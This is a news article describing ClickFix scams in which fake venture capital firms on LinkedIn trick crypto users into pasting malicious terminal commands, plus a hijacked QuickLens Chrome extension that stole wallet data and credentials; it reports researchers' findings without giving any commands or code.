Crypto criminals are refining social engineering tactics to bypass traditional security tools, using fake venture capital outreach to deploy a technique known as ClickFix.

Researchers say attackers are impersonating investment firms on LinkedIn, luring users into fraudulent video calls, and tricking them into running malicious commands on their own devices.

The method avoids conventional malware downloads by relying on victims to manually execute harmful code.

Alongside the fake investor campaign, a compromised Chrome extension has also been used to spread similar attacks, widening the tactic beyond direct messaging scams.

Fake vc identities

According to a report by Moonlock Lab, scammers have created fake venture capital brands including SolidBit, MegaBit, and Lumax Capital.

Attackers approach targets on LinkedIn with partnership proposals and invitations to discuss investment opportunities.

Victims are directed to what appear to be Zoom or Google Meet links.

Instead of a meeting, they land on a fraudulent event page featuring a fake Cloudflare verification step with an I am not a robot checkbox.

Clicking the box copies a malicious command to the clipboard. The page then instructs the user to open their computer’s terminal and paste the so-called verification code.

Once executed, the command launches the attack.

Moonlock Lab said the effectiveness of ClickFix lies in forcing the target to run the command themselves.

Because there is no suspicious file download or automatic exploit, many traditional security controls are bypassed.

The firm alleged that an individual using the name Mykhailo Hureiev, presented as co-founder and managing partner at SolidBit Capital, acted as a primary contact during the LinkedIn outreach stage.

Chrome extension compromise

In a separate development, hackers used a similar ClickFix angle through a compromised Chrome extension.

QuickLens, an extension allowing users to run Google Lens searches directly in their browser, was removed from the Chrome Web Store after it was found pushing malicious scripts.

John Tuckner, founder of Annex Security, said in a Feb. 23 report that QuickLens changed ownership on Feb. 1.

Two weeks later, an updated version was released containing scripts that launched ClickFix attacks and other information-stealing tools.

Around 7,000 users had installed the extension.

A March 2 report by eSecurity Planet stated that the hijacked extension searched for crypto wallet data and seed phrases to steal funds.

It also scraped Gmail inbox contents, YouTube channel data, login credentials, and payment information entered into web forms.

Wider industry impact

Moonlock Lab said ClickFix attacks have gained popularity since last year because they compel victims to execute the malicious payload manually, allowing attackers to sidestep many automated detection systems.

Researchers have tracked the method since at least 2024.

Microsoft Threat Intelligence warned in August that it observed campaigns targeting thousands of enterprise and end-user devices globally each day.

In July, Unit42 reported that the relatively new social engineering technique affected manufacturing, wholesale and retail, state and local governments, as well as utilities and energy sectors.

The post Crypto hackers exploit ClickFix via fake venture capital outreach appeared first on Invezz